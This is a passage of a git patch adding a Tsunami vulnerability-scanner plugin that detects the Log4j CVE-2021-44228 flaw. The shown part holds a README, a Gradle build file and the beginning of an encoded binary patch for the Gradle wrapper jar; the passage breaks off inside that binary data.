From 373978924bdf01568397121dce70282a637364d0 Mon Sep 17 00:00:00 2001
From: hh-hunter <git@uuid.club>
Date: Sat, 11 Dec 2021 15:28:13 +0800
Subject: [PATCH 1/4] add detectors for cve-2021-44228 plugins

---
 community/detectors/log4j_rce/README.md       |  19 +
 community/detectors/log4j_rce/build.gradle    |  83 ++++
 .../gradle/wrapper/gradle-wrapper.jar         | Bin 0 -> 58910 bytes
 .../gradle/wrapper/gradle-wrapper.properties  |   5 +
 community/detectors/log4j_rce/gradlew         | 185 +++++++++
 community/detectors/log4j_rce/gradlew.bat     | 104 +++++
 community/detectors/log4j_rce/settings.gradle |   2 +
 .../Cve202144228DetectorBootstrapModule.java  |  31 ++
 .../Cve202144228VulnDetector.java             | 374 ++++++++++++++++++
 .../cve202144228/crawl/CrawlConfigUtils.java  |  44 +++
 .../cve202144228/crawl/CrawlTargetUtils.java  | 165 ++++++++
 .../cves/cve202144228/crawl/CrawlUtils.java   |  40 ++
 .../cves/cve202144228/crawl/Crawler.java      |  54 +++
 .../cve202144228/crawl/CrawlerException.java  |  23 ++
 .../cves/cve202144228/crawl/ScopeUtils.java   | 145 +++++++
 .../cve202144228/crawl/SimpleCrawlAction.java | 163 ++++++++
 .../cve202144228/crawl/SimpleCrawler.java     |  99 +++++
 .../crawl/SimpleCrawlerModule.java            | 107 +++++
 .../crawl/SimpleCrawlerResults.java           |  50 +++
 .../crawl/SimpleCrawlerSchedulingPool.java    |  25 ++
 .../crawl/SimpleCrawlerWorkerPool.java        |  25 ++
 .../Cve202144228VuLnDetectorTest.java         | 187 +++++++++
 22 files changed, 1930 insertions(+)
 create mode 100644 community/detectors/log4j_rce/README.md
 create mode 100644 community/detectors/log4j_rce/build.gradle
 create mode 100644 community/detectors/log4j_rce/gradle/wrapper/gradle-wrapper.jar
 create mode 100644 community/detectors/log4j_rce/gradle/wrapper/gradle-wrapper.properties
 create mode 100755 community/detectors/log4j_rce/gradlew
 create mode 100644 community/detectors/log4j_rce/gradlew.bat
 create mode 100644 community/detectors/log4j_rce/settings.gradle
 create mode 100644 community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/Cve202144228DetectorBootstrapModule.java
 create mode 100644 community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/Cve202144228VulnDetector.java
 create mode 100644 community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/CrawlConfigUtils.java
 create mode 100644 community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/CrawlTargetUtils.java
 create mode 100644 community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/CrawlUtils.java
 create mode 100644 community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/Crawler.java
 create mode 100644 community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/CrawlerException.java
 create mode 100644 community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/ScopeUtils.java
 create mode 100644 community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/SimpleCrawlAction.java
 create mode 100644 community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/SimpleCrawler.java
 create mode 100644 community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/SimpleCrawlerModule.java
 create mode 100644 community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/SimpleCrawlerResults.java
 create mode 100644 community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/SimpleCrawlerSchedulingPool.java
 create mode 100644 community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/SimpleCrawlerWorkerPool.java
 create mode 100644 community/detectors/log4j_rce/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202144228/Cve202144228VuLnDetectorTest.java

diff --git a/community/detectors/log4j_rce/README.md b/community/detectors/log4j_rce/README.md
new file mode 100644
index 000000000..e7a27dfa6
--- /dev/null
+++ b/community/detectors/log4j_rce/README.md
@@ -0,0 +1,19 @@
+# CVE-2021-44228 VulnDetector
+
+This detector checks for Apache Log4j2 <=2.14.1 JNDI RCE vulnerability (CVE-2021-44228).
+Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default.
+This issue is known to be exploited in the wild.
+This issue is for Log4j2 <=2.14.1 versions.
+
+- https://logging.apache.org/log4j/2.x/security.html
+- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+
+## Build jar file for this plugin
+
+Using `gradlew`:
+
+```shell
+./gradlew jar
+```
+
+Tsunami identifiable jar file is located at `build/libs` directory.
diff --git a/community/detectors/log4j_rce/build.gradle b/community/detectors/log4j_rce/build.gradle
new file mode 100644
index 000000000..38a616f08
--- /dev/null
+++ b/community/detectors/log4j_rce/build.gradle
@@ -0,0 +1,83 @@
+plugins {
+    id 'java-library'
+    id 'com.google.protobuf' version "0.8.14"
+}
+
+description = 'Tsunami CVE-2021-29441 VulnDetector plugin.'
+group 'com.google.tsunami'
+version '0.0.1-SNAPSHOT'
+
+
+repositories {
+    maven { // The google mirror is less flaky than mavenCentral()
+        url 'https://maven-central.storage-download.googleapis.com/repos/central/data/'
+    }
+    mavenCentral()
+    mavenLocal()
+}
+
+
+
+java {
+    sourceCompatibility = JavaVersion.VERSION_1_8
+    targetCompatibility = JavaVersion.VERSION_1_8
+
+    jar.manifest {
+        attributes('Implementation-Title': name,
+                'Implementation-Version': version,
+                'Built-By': System.getProperty('user.name'),
+                'Built-JDK': System.getProperty('java.version'),
+                'Source-Compatibility': sourceCompatibility,
+                'Target-Compatibility': targetCompatibility)
+    }
+
+    javadoc.options {
+        encoding = 'UTF-8'
+        use = true
+        links 'https://docs.oracle.com/javase/8/docs/api/'
+        source = '8'
+    }
+
+    // Log stacktrace to console when test fails.
+    test {
+        testLogging {
+            exceptionFormat = 'full'
+            showExceptions true
+            showCauses true
+            showStackTraces true
+        }
+        maxHeapSize = '1500m'
+    }
+}
+
+ext {
+    tsunamiVersion = '0.0.4'
+    junitVersion = '4.13'
+    mockitoVersion = '2.28.2'
+    truthVersion = '1.0.1'
+    okhttpVersion = '3.12.0'
+    protobufVersion = '3.11.4'
+    jsoupVersion = '1.9.2'
+}
+
+protobuf {
+    protoc {
+        artifact = "com.google.protobuf:protoc:${protobufVersion}"
+    }
+}
+dependencies {
+    implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}"
+    implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}"
+    implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}"
+    implementation "com.google.protobuf:protobuf-java:${protobufVersion}"
+    implementation "com.google.protobuf:protobuf-javalite:${protobufVersion}"
+    implementation "com.google.protobuf:protobuf-java-util:${protobufVersion}"
+    implementation "org.jsoup:jsoup:${jsoupVersion}"
+
+    testImplementation "junit:junit:${junitVersion}"
+    testImplementation "org.mockito:mockito-core:${mockitoVersion}"
+    testImplementation "com.google.truth:truth:${truthVersion}"
+    testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}"
+    testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}"
+    testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}"
+}
diff --git a/community/detectors/log4j_rce/gradle/wrapper/gradle-wrapper.jar b/community/detectors/log4j_rce/gradle/wrapper/gradle-wrapper.jar
new file mode 100644
index 0000000000000000000000000000000000000000..62d4c053550b91381bbd28b1afc82d634bf73a8a
GIT binary patch
literal 58910
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
